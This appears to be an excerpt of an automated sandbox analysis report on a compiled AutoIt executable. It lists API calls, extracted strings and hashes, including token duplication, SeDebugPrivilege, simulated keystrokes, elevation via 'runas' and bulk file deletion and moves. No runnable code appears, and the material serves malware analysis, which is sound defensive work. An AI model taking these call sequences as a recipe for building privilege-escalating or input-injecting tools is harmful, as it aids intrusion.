                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __wfsopen
                                                                              • String ID:
                                                                              • API String ID: 197181222-0
                                                                              • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                              • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                                              • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                              • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                                              APIs
                                                                              • CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID:
                                                                              • API String ID: 2962429428-0
                                                                              • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                              • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                                                                              • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                              • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                                                                              APIs
                                                                              • Sleep.KERNELBASE(000001F4), ref: 03ECBEC9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714904224.0000000003EC9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3ec9000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                              • Instruction ID: 77ff593a75e351fedb8c0d3a70c9deccd003cf3510c3d06744ef9d31149919c3
                                                                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                              • Instruction Fuzzy Hash: 62E0BF7494014EEFDB00DFA8D6496EE7BB4EF04701F1006A5FD05D7680DB309E548A62
                                                                              APIs
                                                                              • Sleep.KERNELBASE(000001F4), ref: 03ECBEC9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714904224.0000000003EC9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3ec9000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction ID: 8f8b875088b035a2107260f5678fb48ebb7ab21485566e8312fc8005c46feaab
                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction Fuzzy Hash: 82E0E67494014EDFDB00DFB8D6496AE7BB4EF04701F1002A5FD01D2280D6309D508A62
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: PF$PF$"DF$$JG$&F$&F$'HG$'|G$*"D$*nF$*vG$+%F$0wE$4rE$5CG$6MG$6NF$6tE$7eF$<HF$<G$ApG$BnE$DvE$F)G$GSG$IqE$K@G$LbF$MdF$MuE$NgF$O*F$PIF$QbG$R+F$RnG$YlE$YtG$Z9G$ZPG$^[F$^oE$_7G$_?G$b"D$fH$i}G$j)F$kQG$lE$rTG$vjE$}eE$~mE$*F$.F$3G$_G$`F$mE$pE$wG
                                                                              • API String ID: 0-4260964411
                                                                              • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                              • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                                                                              • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                              • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                              • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                              • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                              • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                              • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                              • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                              • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                              • SendMessageW.USER32 ref: 0047C2FB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$State$LongProcWindow
                                                                              • String ID: @GUI_DRAGID$F
                                                                              • API String ID: 1562745308-4164748364
                                                                              • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                              • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                                              • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                              • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
APIs
• GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
• IsIconic.USER32(?), ref: 004375E1
• ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
• SetForegroundWindow.USER32(?), ref: 004375FD
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
• GetCurrentThreadId.KERNEL32 ref: 00437619
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
• SetForegroundWindow.USER32(?), ref: 00437645
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
• keybd_event.USER32(00000012,00000000), ref: 0043765D
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
• keybd_event.USER32(00000012,00000000), ref: 00437674
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
• keybd_event.USER32(00000012,00000000), ref: 0043768B
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
• keybd_event.USER32(00000012,00000000), ref: 004376A2
• SetForegroundWindow.USER32(?), ref: 004376AD
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
Similarity
• API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 3778422247-2988720461
APIs
• _memset.LIBCMT ref: 0044621B
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
• GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
• SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
• _wcslen.LIBCMT ref: 0044639E
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• _wcsncpy.LIBCMT ref: 004463C7
• LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
• CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
• CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
• UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
• CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
• CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
• SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
• CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
• DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
Strings
Similarity
• API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
• String ID: $default$winsta0
• API String ID: 2173856841-1027155976
APIs
  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\r6lOHDg9N9.exe,?,C:\Users\user\Desktop\r6lOHDg9N9.exe,004A8E80,C:\Users\user\Desktop\r6lOHDg9N9.exe,0040F3D2), ref: 0040FFCA
  • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
  • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
  • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
• _wcscat.LIBCMT ref: 0044BD96
• _wcscat.LIBCMT ref: 0044BDBF
• __wsplitpath.LIBCMT ref: 0044BDEC
• FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
• _wcscpy.LIBCMT ref: 0044BE73
• _wcscat.LIBCMT ref: 0044BE85
• _wcscat.LIBCMT ref: 0044BE97
• lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
• DeleteFileW.KERNEL32(?), ref: 0044BED5
• MoveFileW.KERNEL32(?,?), ref: 0044BEF5
• CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
• DeleteFileW.KERNEL32(?), ref: 0044BF17
• CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
• FindClose.KERNEL32(00000000), ref: 0044BF35
• MoveFileW.KERNEL32(?,?), ref: 0044BF51
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
• FindClose.KERNEL32(00000000), ref: 0044BF7E
Strings
Similarity
• API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
• String ID: \*.*
• API String ID: 2188072990-1173974218
APIs
• __invoke_watson.LIBCMT ref: 004203A4
  • Part of subcall function 00417D93: _memset.LIBCMT ref: 00417DBB
  • Part of subcall function 00417D93: IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00417E6F
  • Part of subcall function 00417D93: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 00417E79
  • Part of subcall function 00417D93: UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 00417E86
  • Part of subcall function 00417D93: GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00417EA1
  • Part of subcall function 00417D93: TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00417EA8
• __get_daylight.LIBCMT ref: 004203B0
• __invoke_watson.LIBCMT ref: 004203BF
• __get_daylight.LIBCMT ref: 004203CB
• __invoke_watson.LIBCMT ref: 004203DA
• ____lc_codepage_func.LIBCMT ref: 004203E2
• _strlen.LIBCMT ref: 00420442
• __malloc_crt.LIBCMT ref: 00420449
• _strlen.LIBCMT ref: 0042045F
• _strcpy_s.LIBCMT ref: 0042046D
• __invoke_watson.LIBCMT ref: 00420482
• GetTimeZoneInformation.KERNEL32(00496C28), ref: 004204AA
• WideCharToMultiByte.KERNEL32(?,?,00496C2C,?,?,0000003F,?,?), ref: 00420528
• WideCharToMultiByte.KERNEL32(?,?,00496C80,000000FF,?,0000003F,?,?,?,00496C2C,?,?,0000003F,?,?), ref: 0042055C
  • Part of subcall function 00413A88: __lock.LIBCMT ref: 00413AA6
  • Part of subcall function 00413A88: ___sbh_find_block.LIBCMT ref: 00413AB1
  • Part of subcall function 00413A88: ___sbh_free_block.LIBCMT ref: 00413AC0
  • Part of subcall function 00413A88: RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
  • Part of subcall function 00413A88: GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
• __invoke_watson.LIBCMT ref: 004205CC
Strings
Similarity
• API ID: __invoke_watson$ByteCharExceptionFilterMultiProcessUnhandledWide__get_daylight_strlen$CurrentDebuggerErrorFreeHeapInformationLastPresentTerminateTimeZone____lc_codepage_func___sbh_find_block___sbh_free_block__lock__malloc_crt_memset_strcpy_s
• String ID: S\
• API String ID: 4084823496-393906132
APIs
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
• __swprintf.LIBCMT ref: 00434D91
• _wcslen.LIBCMT ref: 00434D9B
• _wcslen.LIBCMT ref: 00434DB0
• _wcslen.LIBCMT ref: 00434DC5
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
• _memset.LIBCMT ref: 00434E27
• _wcslen.LIBCMT ref: 00434E3C
• _wcsncpy.LIBCMT ref: 00434E6F
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
• CloseHandle.KERNEL32(00000000), ref: 00434EB4
• RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
• CloseHandle.KERNEL32(00000000), ref: 00434ECE
Strings
Similarity
• API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
• API String ID: 302090198-3457252023
APIs
  • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
• GetLastError.KERNEL32 ref: 004644B4
• GetCurrentThread.KERNEL32 ref: 004644C8
• OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
• GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
• OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
Strings
Similarity
• API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
• String ID: SeDebugPrivilege
• API String ID: 1312810259-2896544425
APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
  • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\r6lOHDg9N9.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
  • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
• IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
• GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\r6lOHDg9N9.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
  • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
• SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\r6lOHDg9N9.exe,00000004), ref: 0040D7D6
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
• SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\r6lOHDg9N9.exe,00000004), ref: 00431B0E
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\r6lOHDg9N9.exe,00000004), ref: 00431B3F
• GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
• ShellExecuteW.SHELL32(00000000), ref: 00431B92
  • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
  • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
  • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                                • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                                                                • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                               Memory Dump Source
                                                                               • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                              • String ID: @GH$@GH$C:\Users\user\Desktop\r6lOHDg9N9.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                              • API String ID: 2493088469-1406293824
                                                                              • Opcode ID: 69cfb0be49d24e5250ef6e64c59b5ea2b0a961f7c54b5140d3e7fdea8d41d4c7
                                                                              • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                              • Opcode Fuzzy Hash: 69cfb0be49d24e5250ef6e64c59b5ea2b0a961f7c54b5140d3e7fdea8d41d4c7
                                                                              • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                                                                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                                                                              • __wsplitpath.LIBCMT ref: 004038B2
                                                                                • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                              • _wcscpy.LIBCMT ref: 004038C7
                                                                              • _wcscat.LIBCMT ref: 004038DC
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                                                                                • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                                                                              • _wcscpy.LIBCMT ref: 004039C2
                                                                              • _wcslen.LIBCMT ref: 00403A53
                                                                              • _wcslen.LIBCMT ref: 00403AAA
                                                                              Strings
                                                                              • Unterminated string, xrefs: 0042B9BA
                                                                              • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                                                                              • _, xrefs: 00403B48
                                                                              • Error opening the file, xrefs: 0042B8AC
                                                                              Similarity
                                                                              • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                              • API String ID: 4115725249-188983378
                                                                              • Opcode ID: 3d47019ae40ddf295a6fa6cd32c8ae21ab53d4334480ddcc4f0e34d1fe96fec4
                                                                              • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                                                                              • Opcode Fuzzy Hash: 3d47019ae40ddf295a6fa6cd32c8ae21ab53d4334480ddcc4f0e34d1fe96fec4
                                                                              • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                                                              • FindClose.KERNEL32(00000000), ref: 00434C88
                                                                              • FindClose.KERNEL32(00000000), ref: 00434C9C
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                                                              • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                                                              • FindClose.KERNEL32(00000000), ref: 00434D35
                                                                              • FindClose.KERNEL32(00000000), ref: 00434D43
                                                                              Similarity
                                                                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                              • String ID: *.*
                                                                              • API String ID: 1409584000-438819550
                                                                              • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                              • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                                                                              • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                              • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                                                                              Similarity
                                                                              • API ID: Timetime$Sleep
                                                                              • String ID: BUTTON
                                                                              • API String ID: 4176159691-3405671355
                                                                              • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                              • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                                                                              • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                              • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,74DE8FB0,74DE8FB0,?,?,00000000), ref: 00442E40
                                                                              • FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 00442EA4
                                                                              • FindClose.KERNEL32(00000000,?,00000000), ref: 00442EB5
                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00442ED1
                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00442EF0
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00442F3B
                                                                              • SetCurrentDirectoryW.KERNEL32(0048A090,?,?,?,00000000), ref: 00442F6D
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00442F75
                                                                              • FindClose.KERNEL32(00000000), ref: 00442F80
